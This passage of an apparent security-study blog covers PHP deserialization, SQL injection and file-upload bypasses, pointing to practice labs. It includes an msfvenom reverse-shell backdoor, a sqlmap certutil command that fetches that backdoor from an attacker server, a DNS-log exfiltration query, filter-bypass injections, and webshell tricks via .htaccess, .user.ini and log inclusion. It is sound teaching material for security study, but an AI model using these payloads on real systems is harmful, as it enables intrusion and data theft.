#82AAFF">__invoke</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//called automatically when an object is invoked as if it were a function</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__call</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//triggered when an inaccessible method is called in object context</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__callStatic</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//triggered when an inaccessible method is called in static context</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__get</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//reads data from inaccessible properties</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__set</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//writes data to inaccessible properties</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__isset</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//triggered by isset() or empty() on inaccessible properties</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__unset</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//triggered by unset() on inaccessible properties</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__toString</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//triggered when the object is used as a string</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__sleep</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//serialize() checks whether the class defines a magic method __sleep(); if it does, that method is called first</span></span></code></pre></div><ul><li>Demo:</li></ul><div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #676E95; font-style: italic">//serialization &amp; deserialization</span></span><span class="line"><span style="color: #C792EA">class</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">demotest</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">name</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">xiaodi</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sex</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">man</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">age</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">29</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">example</span><span style="color: #89DDFF">=</span><span style="color: #F78C6C">new</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">demotest</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">serialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">example</span><span style="color: #89DDFF">);</span><span style="color: #676E95; font-style: italic">//serialize -> O:8:"demotest":3:{s:4:"name";s:6:"xiaodi";s:3:"sex";s:3:"man";s:3:"age";s:2:"29";}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">u</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">unserialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">);</span><span style="color: #676E95; font-style: italic">//unserialize -> object(demotest)#2 (3) { ["name"]=> string(6) "xiaodi" ["sex"]=> string(3) "man" ["age"]=> string(2) "29" }</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D"><br></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #82AAFF">var_dump</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">u</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"><br></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><p>Creating the object triggers the <code>__construct</code> magic method, destroying it triggers <code>__destruct</code>, and using the object as a string triggers <code>__toString()</code></p><h4 id="原生类"><a href="#原生类" class="headerlink" title="Built-in classes"></a>Built-in classes</h4><p><a href="https://www.anquanke.com/post/id/264823">浅析PHP原生类 (A brief analysis of PHP built-in classes) - 安全客 (anquanke.com)</a></p><h4 id="漏洞示例"><a href="#漏洞示例" class="headerlink" title="Vulnerability examples"></a>Vulnerability examples</h4><h5 id="wakeup-方法绕过"><a href="#wakeup-方法绕过" class="headerlink" title="Bypassing __wakeup()"></a>Bypassing __wakeup()</h5><ul><li><p>If the class defines a __wakeup() method, it is invoked automatically when unserialize() is called on the data</p></li><li><p>However, when the value in the serialized string that <strong>states the number of object properties is larger than the real number of properties</strong>, the execution of <strong>__wakeup() is skipped</strong> (this only holds on older, unpatched PHP versions)</p></li></ul><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}</span></span><span class="line"><span style="color: #babed8">//change to</span></span><span class="line"><span style="color: #babed8">O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}</span></span></code></pre></div><h2 id="JAVA反序列化"><a href="#JAVA反序列化" class="headerlink" title="Java deserialization"></a>Java deserialization</h2><h4 id="原理"><a href="#原理" class="headerlink" title="Principle"></a>Principle</h4><ul><li>Serialization: Java object -> byte sequence</li><li>Deserialization: byte sequence -> Java object</li></ul><h4 id="利用"><a href="#利用" class="headerlink" title="Exploitation"></a>Exploitation</h4><h5 id="Ysoserial"><a href="#Ysoserial" class="headerlink" title="Ysoserial"></a>Ysoserial</h5><ul><li><p><a href="https://github.com/frohoff/ysoserial">frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)</a></p></li><li><p><a href="https://blog.csdn.net/weixin_46684578/article/details/128499673">[Web Security] Basic use of Ysoserial - CSDN blog</a></p></li></ul>]]></content>
<summary type="html"><h1 id="反序列化"><a href="#反序列化" class="headerlink" title="Deserialization"></a>Deserialization</h1><h4 id="什么是反序列化"><a href="#什么是反序列化" class="headerlink" title="什么是</summary>
</entry>
<entry>
<title>Web Attack and Defense: Common Vulnerabilities</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E.html</id>
<published>2024-03-05T15:07:08.000Z</published>
<updated>2024-04-21T12:31:45.059Z</updated>
<content type="html"><![CDATA[<h1 id="WEB攻防-通用漏洞"><a href="#WEB攻防-通用漏洞" class="headerlink" title="Web Attack and Defense: Common Vulnerabilities"></a>Web Attack and Defense: Common Vulnerabilities</h1><p>Large practice range: <a href="https://vulhub.org/#/environments/">Vulhub - Docker-Compose file for vulnerability environment</a></p><h2 id="SQL注入-补充内容"><a href="#SQL注入-补充内容" class="headerlink" title="SQL Injection: Additional Notes"></a>SQL Injection: Additional Notes</h2><h3 id="ACCESS注入"><a href="#ACCESS注入" class="headerlink" title="Access injection"></a>Access injection</h3><h4 id="偏移注入"><a href="#偏移注入" class="headerlink" title="Offset injection"></a>Offset injection</h4><h5 id="使用场景"><a href="#使用场景" class="headerlink" title="When it applies"></a>When it applies</h5><ul><li>The table name is known</li><li>The column names are unknown</li><li>The column names are unusual and cannot be brute-forced</li></ul><h5 id="注入原理"><a href="#注入原理" class="headerlink" title="How it works"></a>How it works</h5><ul><li><p>Suppose the queried table has 8 columns and the admin table has 3 (the column count must be determined first).</p></li><li><p>Union query payload: union select 1,2,3,4,5,6,7,8 from admin</p></li><li><p>Without knowing how many columns admin has, try the payload union select 1,2,3,4,5,6,7,admin.* from admin; the page returns an error</p></li><li><p>Keep going until the payload union select 1,2,3,4,5,admin.* from admin returns a normal page, which shows that the admin table has three columns</p></li><li><p>Then, by moving the position of admin.*, different data can be echoed back</p></li></ul><h3 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MySQL"></a>MySQL</h3><ul><li><p>Read a file</p><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">select load_file('D:/a.txt');</span></span></code></pre></div></li><li><p>Write a file</p><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">select 'xxxx' into outfile 'D:/a.txt';</span></span></code></pre></div></li></ul><h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><ul><li><a href="https://www.cnblogs.com/bmjoker/p/9326258.html">sqlmap: detailed notes + mind map - bmjoker - 博客园 (cnblogs.com)</a></li></ul><h4 id="sqlmap联动msf"><a href="#sqlmap联动msf" class="headerlink" title="Chaining sqlmap with msf"></a>Chaining sqlmap with msf</h4><ul><li><p>Generate the backdoor with msf on the attacker's server</p><div class="language-bash"><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">msfvenom</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-p</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">windows/meterpreter/reverse_http</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lhost=SERVER_IP</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lport=PORT</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-f</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">exe</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-o</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sql.exe</span></span></code></pre></div></li><li><p>Start the listener:</p><div class="language-bash"><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">use</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">exploit/multi/handler</span></span><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lhost</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0.0</span><span style="color: #C3E88D">.0.0</span></span><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lport</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">6666</span></span><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">run</span></span></code></pre></div></li><li><p>Use sqlmap to make the target fetch and save the backdoor file</p><div class="language-bash"><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">python</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sqlmap.py</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-u</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">--os-cmd=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">certutil -urlcache -split -f http://xxxx/sql.exe c:/sql.exe</span><span style="color: #89DDFF">"</span></span></code></pre></div></li></ul><h4 id="脚本使用"><a href="#脚本使用" class="headerlink" title="Using tamper scripts"></a>Using tamper scripts</h4><p>The tool cannot automatically detect the encryption/encoding type or the data format (such as JSON); these have to be identified by manual injection first</p><ul><li>For example, to base64-encode the payload:<div class="language-bash"><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">python</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sqlmap.py</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-u</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">url</span><span style="color: 
#89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">--tamper=base64encode.py</span></span></code></pre></div></li></ul><h4 id="基于堆叠注入-绕过select过滤"><a href="#基于堆叠注入-绕过select过滤" class="headerlink" title="Bypassing a select filter (with stacked queries)"></a>Bypassing a select filter (with stacked queries)</h4><p><a href="https://www.cnblogs.com/cmredkulaa/p/14563311.html">Several ways to bypass a select filter - 2hangG3 - 博客园 (cnblogs.com)</a></p><ul><li><p>Original statement:</p><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">1</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">;select flag from `1919810931114514`;</span></span></code></pre></div></li><li><p>Because of <code>return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);</code>, select is filtered</p></li><li><p>Changed to:</p><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">1</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">;set @sql = CONCAT(</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">se</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">,</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">lect </span><span style="color: #89DDFF">*</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">from</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">`</span><span style="color: #C3E88D">1919810931114514</span><span style="color: #89DDFF">`</span><span style="color: #BABED8">;</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">);prepare stmt from @sql;EXECUTE stmt;</span></span></code></pre></div></li><li><p>Explanation:</p><ul><li><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">sEt</span><span style="color: #BABED8"> @sql </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">CONCAT</span><span style="color: #BABED8">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">se</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">lect * from `1919810931114514`;</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">);</span></span></code></pre></div><ul><li><code>set</code> assigns a value to a variable</li><li><code>CONCAT</code> <strong>concatenates the statement, bypassing the filter</strong></li></ul></li><li><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">prepare stmt </span><span style="color: #F78C6C">from</span><span style="color: #BABED8"> @sql;</span></span></code></pre></div><p><code>prepare</code> prepares a statement and gives it a name by which it can be referenced later</p></li><li><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">EXECUTE stmt;</span></span></code></pre></div><p><code>execute</code> runs the prepared statement</p></li></ul></li></ul><h3 
id="二次注入"><a href="#二次注入" class="headerlink" title="Second-order injection"></a>Second-order injection</h3><h5 id="原理"><a href="#原理" class="headerlink" title="Principle"></a>Principle</h5><ul><li>Ordinary injection: the data goes straight into the SQL query</li><li>Second-order injection: the input is processed and <strong>stored</strong>; when it is read back out it enters an SQL query <strong>again</strong></li></ul><h5 id="过程"><a href="#过程" class="headerlink" title="Process"></a>Process</h5><ul><li>Insert <code>1'#</code></li><li>It is escaped to <code>1\'#</code></li><li>No injection is possible at this point, but when it is <strong>saved in the database</strong> it becomes the original <code>1'#</code> again</li><li>The stored <code>1'#</code> is then used for the injection; this requires that the data is not escaped when it is read back</li></ul><h5 id="案例"><a href="#案例" class="headerlink" title="Case study"></a>Case study</h5><p><a href="https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF2018]Unfinish">网鼎杯2018-Unfinish</a></p><ul><li>Inject the SQL statement into <code>username</code> at registration</li><li>The data is escaped at this point, so <strong>no injection is possible</strong></li><li>After logging in with the e-mail address, <code>username</code> is loaded again; this time it is not escaped and the injected statement executes</li></ul><h3 id="DNS注入"><a href="#DNS注入" class="headerlink" title="DNS injection"></a>DNS injection</h3><ul><li>DNS protocol: resolves domain names to IP addresses; the DNS log records the name-to-IP resolution requests</li></ul><p><em><strong>The core of DNS injection is turning a blind injection into an error-based one</strong></em></p><ul><li>Example payload:</li></ul><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">select</span><span style="color: #BABED8"> load_file(</span><span style="color: #82AAFF">concat</span><span style="color: #BABED8">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">//</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">,(</span><span style="color: #F78C6C">select</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">database</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">limit</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #BABED8">,</span><span style="color: #F78C6C">1</span><span style="color: #BABED8">),</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">.81k8pu.dnslog.cn/abc</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">));</span></span></code></pre></div><h2 id="文件上传"><a href="#文件上传" class="headerlink" title="File Upload"></a>File Upload</h2><p>Practice range: <a href="https://github.com/c0ny1/upload-labs">c0ny1/upload-labs: a lab that aims to cover every type of upload vulnerability (github.com)</a></p><p>Recommended article: <a href="https://zhuanlan.zhihu.com/p/631648316">A thorough explanation of file upload vulnerability principles, methods and types - 知乎 (zhihu.com)</a></p><h3 id="黑白盒测试"><a href="#黑白盒测试" class="headerlink" title="Black-box and White-box Testing"></a>Black-box and White-box Testing</h3><h4 id="黑盒"><a href="#黑盒" class="headerlink" title="Black box"></a>Black box</h4><p><strong>Look for every application function that involves a file upload</strong></p><ol><li>Does the personal user centre have a file upload function</li><li>Does the back-end management system have a file upload function</li><li>Probe with a directory dictionary for file upload endpoints and construct their addresses</li><li>Probe with a directory dictionary for editor directories and construct their addresses</li></ol><h4 id="白盒"><a href="#白盒" class="headerlink" title="White box"></a>White box</h4><p><strong>Look at three things: the middleware, the editor and the functional code</strong></p><ol><li>Middleware: look directly at the common pairings for the language environment</li><li>Editor: look directly at the directory structure or search for keywords</li><li>Functional code: look directly at the application source or search for keywords</li></ol><h3 id="解析执行"><a href="#解析执行" class="headerlink" title="Parsing and Execution"></a>Parsing and Execution</h3><h4 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h4><ul><li>A .user.ini file can be uploaded to make PHP parse a chosen file, for example<div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">auto_prepend_file=test.txt</span></span><span class="line"><span style="color: #babed8">//or</span></span><span class="line"><span style="color: #babed8">auto_append_file=test.txt</span></span></code></pre></div></li></ul><h4 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h4><h5 id="原理-1"><a href="#原理-1" class="headerlink" title="Principle"></a>Principle</h5><ul><li>The .htaccess file is a configuration file of the Apache server</li><li>The Apache configuration must have AllowOverride All (the default is None)</li></ul><h5 id="条件"><a href="#条件" class="headerlink" 
title="Conditions"></a>Conditions</h5><ul><li>Apache has the rewrite module enabled</li></ul><h5 id="示例"><a href="#示例" class="headerlink" title="Example"></a>Example</h5><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><FilesMatch "x.png"></span></span><span class="line"><span style="color: #babed8">SetHandler application/x-httpd-php</span></span><span class="line"><span style="color: #babed8"></FilesMatch></span></span></code></pre></div><ul><li>This makes the file named x.png in that directory execute as PHP</li><li>Upload the .htaccess, then upload a file named x.png, and it executes</li></ul><h3 id="过滤绕过"><a href="#过滤绕过" class="headerlink" title="Filter Bypasses"></a>Filter Bypasses</h3><h4 id="绕过过滤"><a href="#绕过过滤" class="headerlink" title="Bypassing a <?php?> filter"></a>Bypassing a <?php?> filter</h4><ul><li><code><? ?></code> requires the short-tag switch short_open_tag to be enabled</li><li><code><?= ?></code> requires PHP version > PHP 5.4.0</li><li><code><% %></code> requires asp_tags set to On</li><li><code><script language="php"></script></code> no longer works from PHP 7 onwards</li></ul><h4 id="利用反引号-绕过"><a href="#利用反引号-绕过" class="headerlink" title="Bypassing with backticks ``"></a>Bypassing with backticks ``</h4><ul><li>The backtick operator "`" is equivalent to the shell_exec() function: it runs its contents as a shell command</li></ul><h4 id="包含日志"><a href="#包含日志" class="headerlink" title="Including Log Files"></a>Including Log Files</h4><ul><li><p>Write the backdoor code into the UA header</p></li><li><p>Write a .user.ini configuration file, and reach the log file's contents through file inclusion</p></li><li><p>For example:</p><p><code>user.ini: auto_prepend_file=test.png</code><br><code>test.png: <?=include"/var/lo"."g/nginx/access.lo"."g"?></code></p></li></ul><h4 id="短网址绕过”-”"><a href="#短网址绕过”-”" class="headerlink" title="Short-address bypass for the dot"></a>Short-address bypass for the dot</h4><ul><li>When remote file inclusion is needed but the dot <code>.</code> is filtered, a shortened address can be used</li><li>For example, <code>http://47.94.236.117/</code> written in its decimal form <code>http://794750069/</code> bypasses the filter</li></ul><h3 id="文件头检测"><a href="#文件头检测" class="headerlink" title="File Header Checks"></a>File Header Checks</h3><ul><li><p>The file header is checked for an image format; an image check, for instance, looks for <code>GIF89a</code> at the start of the file</p></li><li><p>The check can be bypassed by adding that signature at the start of the file, for example</p><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">user.ini:</span></span><span class="line"><span style="color: #babed8">GIF89A</span></span><span class="line"><span style="color: #babed8">auto_prepend_file=test.png</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">test.png:</span></span><span class="line"><span style="color: #babed8">GIF89A</span></span><span class="line"><span style="color: #babed8"><?=include"/var/lo"."g/nginx/access.lo"."g"?></span></span></code></pre></div></li><li><p><a href="https://www.cnblogs.com/WangAoBo/p/6366211.html">Header signatures of common file types - M4x - 博客园 (cnblogs.com)</a></p></li></ul><h3 id="条件竞争"><a href="#条件竞争" class="headerlink" title="Race Conditions"></a>Race Conditions</h3><p><a href="https://blog.csdn.net/weixin_45588247/article/details/118796606?spm=1001.2014.3001.5501">[File upload bypass] Race condition vulnerabilities - CSDN blog</a></p><h4 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="How the vulnerability arises"></a>How the vulnerability arises</h4><blockquote><p>The server handles requests from different users concurrently, so when <strong>concurrency is handled badly</strong> or the <strong>order of operations</strong> is designed poorly, this class of problem arises</p><p>For example:</p><ul><li>The upload source code does not validate the uploaded file</li><li>The check is performed only after the upload has already succeeded</li><li>If the file format meets the requirements the file is renamed; if it does not, the file is deleted</li></ul></blockquote><h4 id="利用"><a href="#利用" class="headerlink" title="Exploitation"></a>Exploitation</h4><ul><li>Create a situation in which 10000 clients upload 1.php simultaneously while another 10000 request 1.php at the same time</li><li>During an upload, the file remains in the server's upload directory for <strong>a period of time</strong></li><li>The server-side script also needs <strong>some processing time</strong> to decide whether the file is legitimate and to delete it</li><li>So at some moment the <strong>server has not yet managed to delete the file</strong></li><li>At that moment 1.php is used to <strong>generate</strong> another PHP file</li></ul><h3 id="二次渲染"><a href="#二次渲染" class="headerlink" title="Second Rendering"></a>Second Rendering</h3><p><a href="https://blog.csdn.net/qq_40800734/article/details/105920149">File upload: bypassing second rendering - CSDN blog</a></p><p><a href="https://blog.csdn.net/weixin_45588247/article/details/119177948">[File upload bypass] Second rendering - CSDN blog</a></p><h4 id="二次渲染原理"><a href="#二次渲染原理" class="headerlink" title="How second rendering works"></a>How second rendering works</h4><blockquote><p>After a file is uploaded, the site processes the image a second time (format, size requirements and so on): the server <strong>generates</strong> a <strong>new image</strong> from the original and places it in the corresponding tag on the page for display.</p></blockquote><h4 id="识别"><a href="#识别" class="headerlink" title="Identification"></a>Identification</h4><ul><li>Check whether the image file size changed between upload and display</li></ul><h4 id="绕过"><a href="#绕过" class="headerlink" title="Bypass"></a>Bypass</h4><ul><li>Use a script to generate the image shell, for example:<div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">p </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">array</span><span style="color: #89DDFF">(</span><span style="color: #F78C6C">0xa3</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x9f</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> 
</span><span style="color: #F78C6C">0x67</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xf7</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x0e</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x93</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x1b</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x23</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xbe</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x2c</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x8a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xd0</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x80</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xf9</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xe1</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xae</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x22</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xf6</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xd9</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> 
</span><span style="color: #F78C6C">0x43</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5d</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xfb</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xae</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xcc</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x01</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xdc</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x01</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xdc</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa3</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x9f</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x67</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa5</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xbe</span><span style="color: #89DDFF">,</span><span style="color: 